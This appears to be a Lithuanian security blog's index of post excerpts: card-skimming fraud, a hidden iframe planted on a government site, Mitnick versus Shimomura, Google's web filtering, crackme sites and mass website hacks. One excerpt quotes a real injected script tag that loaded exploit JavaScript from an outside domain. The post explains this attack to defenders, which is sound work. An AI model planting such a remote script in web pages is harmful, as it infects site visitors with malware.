Baigėsi mano atostogos. Visai smagiai su draugais pabuvau Slovakijoje. Didžiąją dalį laiko kopinėjom kalnais (su nakvyne juose), kartais plaukiojom upe. Čia aš plaukiu plaustu.

Kur dar 4 plaukę kartu - velniai žino. Gal dar neišnėrę. Važiavom savu automobiliu, nes su kelionių agentūra taip nepasilinksminsi. Bet ne apie tai bus šis pasakojimas. Šį kartą papasakosiu apie tai, kaip technologijų neišmanantys, bet lengvai bendraujantys apgavikai švarina svetimas mokėjimo korteles. Kadangi dažniausiai įdomūs pasakojimai su visomis smulkmenomis, tai jis bus gausiai iliustruotas. Tiesa, iliustracijos ne mano, “vaikščiojančios” internetu, bet puikiai tiks šiam pasakojimui. Kai ką ir nutylėsiu, kad visokie “gudručiai” nepradėtų to taikyti praktikoje. Technika žinoma labai senai ir vis dar naudojama. Važiuojam.

Skaityti visą įrašą…

Tik šį kartą tas nulaužimas ne toks akivaizdus ir neaišku ar tai rusų darbas. Pamenat, kažkada rašiau apie nulaužtą Susisiekimo ministerijos tinklalapį ir žalingo kodo platinimą per jį? Dabar tas pats vyksta su www.regitra.lt. Vizualiai puslapis atrodo normaliai.

Bet jame yra tas bjaurusis nulaužimas, kurio nesimato vizualiai, tačiau puslapis išnaudojamas tolimesniems tikslams. Pažiūrėjus į tinklalapio kodą, jame galima rasti įsilaužėlių pridėtą eilutę. Ta eilutė prasideda iš karto už <html> žymės ir lankytojams 1×1 taško dydžio langelyje atidaro kitą puslapį, kuris vartotojui nematant užkraunamas jo naršyklėje.

Skaityti visą įrašą…

Tinklalapyje www.manobite.lt baigesi SSL sertifikato galiojimas. Naujos naršyklės iš karto pradėjo tą puslapį rodyti štai taip:

Skaityti visą įrašą…

Per 1994 metų Kalėdas, Tsutomu Shimomura sulaukė skambučio iš savo kolegų, kad kažkas prisijungė prie jo naudojamos ir tam metui galingos IT sistemos bei nukopijavo didelį kiekį failų. Tsutomu tuo metu jau buvo gerai žinomas specialistas, kuris dirbo prie kompiuterinių tinklų apsaugos projektų ir konsultavo daug didelių kompanijų bei nacionalinio saugumo agentūras.

Nustatęs kas buvo nukopijuota, Tsutomu pamatė, kad buvo kopijuota ne viskas iš eilės, bet atidžiai pasirinkti tik reikiami failai. Juose buvo informacija, kuri sudomintų tik žmones, norinčius įveikti kompiuterinių ir mobiliojo ryšio tinklų saugumą. Nors oficialiai ir nebuvo įrodyta, kad šį įsilaužimą įvykdė būtent Mitnikas, tačiau nuo šio momento Šimomurai pagauti Mitniką tapo asmeniniu tikslu. Pradėjęs bendradarbiauti su FTB, jis pradėjo diegti stebėjimo priemones bei naudoti savo sukurtą programinę įrangą įsilaužimų sekimui Internete. Jo pagalba tyrėjai nustatė telekomunikacinės įrangos manipuliavimo atvejus, duomenų vagystes iš Motorola, Apple Computer bei kitų kompanijų ir 20 000 kreditinių kortelių duomenų pasisavinimą.

Skaityti visą įrašą…

Taip, tokie egzistuoja. Kokie būna hakeriai, jau rašiau anksčiau. Karai vyksta dažnai dėl požiūrių skirtumo, norint parodyti kuri grupuotė kietesnė arba toks karas tiesiog privalo būti. Visai kaip gatvėj. Policininkai prieš vagis, reperiai prieš popsą, plikai skusti prieš ilgaplaukius ir t.t. IT pasaulyje varžomasi kurie vienas kitą greičiau nulauš arba atliks daugiau defeis’ų tinklalapiams, kada policija pagaus įsilaužėlius ir pan. Visai kaip versle, tik čia skaičiuojami ne nulaužti tinklalapiai, bet užimta rinkos dalis. Ir nesvarbu ar tavo verslas legalus ar ne. Legalus verslas iš rinkos bando išstumti nelegalų. Jį išstūmęs, pradeda konkuruoti tarpusavyje ir t.t. Žodžiu, nors ir skirtingų požiūrių, bet žmonės visur vienodi ir nuolat nori su kažkuo kariauti bei varžytis. Viena tokių įdomesnių kovų IT pasaulyje turbūt vyko tarp Kevino Mitniko ir Tsutomu Shimomuros. Pirmasis buvo tas, kuris bėgo, o antrasis - kuris gaudė. Skirtingi šaltiniai skirtingai pasakoja, bet Kevinas bėgo dėl to, kad įsilaužė į Motorola, NEC, Nokia, Sun Microsystems ir Fujitsu Siemens IT sistemas. Taip pat pavogė krūvą programinių kodų, ilgai už nosies vedžiojo FTB bei nemokamai važinėjo Los Angel’o viešuoju transportu. Jam priskiriama ir daugiau visokių darbelių, kurių įrodyti teisme nepavyko.

Skaityti visą įrašą…

Šiandienos laikraščių pagrindinė tema apie asmens duomenis yra ta, kad Ūkio ministerija paviešino VP Market dešimtuko asmens duomenis. Ir pirmojo tai parašiuso blog’o, ir naujienų portalų komenataruose klausiama ir kas gi čia tokio? Kokia iš tų duomenų nauda, išskyrus tą, kad galėsi Marcinkevičių su gimtadieniu pasveikinti? O šioje nuotraukoje esantį pilietį ar pažįstat?

Skaityti visą įrašą…

Vakar Google startavo su nauja paslauga įmonėms. Paslaugos tikslas - stabdyti bet kokį žalingo kodo (virusų, šnipinėjančių programų ir t.t.) patekimą į organizacijos tinklą. Filtruojami ne adresai, bet visas interneto turinys. Prie to dar gauni ir detalią web srauto analizę, papildomą šifravimą, kai dirbi iš viešų vietų, galima valdyti interneto apribojimą visaip kaip ir t.t. Kaip kas veikia iš technologinės pusės, man šiuo metu dar neaišku, bet paslauga bet kuriuo atveju yra įdomi. Juolab, kad kompiuteryje nereikia diegti jokių programų ir jų prižiūrėti. Įrašą papildysiu, kai išsiaiškinsiu daugiau. Gal tai kiek pasirodys keista Google mylėtojams, bet paslauga yra mokama. Vienai darbo vietai kainuoja 36$ per metus. Antivirusinės sistemos licencija vieneriems metams kainuoja ~100 Lt, tad Google paslauga gaunasi daug pigesnė, o galimybių suteikia daug daugiau. Taip pat nereikia nieko prižiūrėti ir atnaujinti, visu tuo jau pasirūpinta. Ir visiškai nesvarbu ar darbuotojas dirba iš ofiso, namų, viešbučio ar kur kitur. Daug svarbios ir slaptos informacijos valdančioms organizacijoms, tai turbūt nebūtų priimtina paslauga (kuri iš jų svarbią info siunčiasi iš interneto nešifruotą, a?), bet eiliniams Lietuvos prekybininkams su krūvom vadybininkų - pats tas. Tai yra ne pirmas Google saugumo produktas. Apie šį daugiau info rasite čia (ir apie kitus ten pat): http://www.google.com/a/help/intl/en/security/web.html. Pasirodo, saugumo produktai su palaikymu gali kainuoti ir nedaug, kai į tą rinką pradeda lįsti Google. :).

Eilinį kartą kelias dienas galvojau parašyti viena tema, bet kažkaip spontaniškai vėl gavosi kita tema. Vienam komentare po įrašu perskaičiau, kad kažkas bando įveikti www.try2hack.lt užduotis. Atleiskit, bet primityvesnių užduočių matyti dar neteko. Na gerai, visiškai žaliam pradedančiajam gal ir tinka, bet norintiems jėgas išbandyti rimčiau, siūlau pabandyti šiais adresais esančias užduotis. Įvardinsiu tik keletą iš jų ir nebūtinai naujausių. Senai jau žinios neatnaujintos šioje srityje.

http://crackmes.de/ - vieta besidomintiems reverse engineering‘u. Šiame puslapyje nuolat pasirodo nedidelių programėlių, kuriose realizuotos įvairaus sudėtingumo programų apsaugos funkcijos. Prie jų būna ir taisyklės kokiais metodais tą apsaugą galima nulaužti, o kokiais ne. Kai kas nors apsaugą įveikia, tuomet įdeda aprašymą kaip tai padarė. Puiki vieta žinių tobulinimui, norintiems sustiprinti savo programų apsaugą.

Skaityti visą įrašą…

Šiemet organizuoju “WEB HACKING: įveikti internetą” mokymus. Kursui tuoj bus vieneri metai, bet visą tą laiką jis sėkmingai atnaujinamas. Savaitgalį į jį sudėjau ir paskutinio masinio nulaužimo analizę. Įdomiai ta visa ataka padaryta. Pirmą kartą mokymai truko 2 dienas, po to 3, dabar jau neaišku ar į 3 normaliai tilpti pavyks. Bet gal apie viską nuo pradžių.

Skaityti visą įrašą…

Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

Skaityti visą įrašą…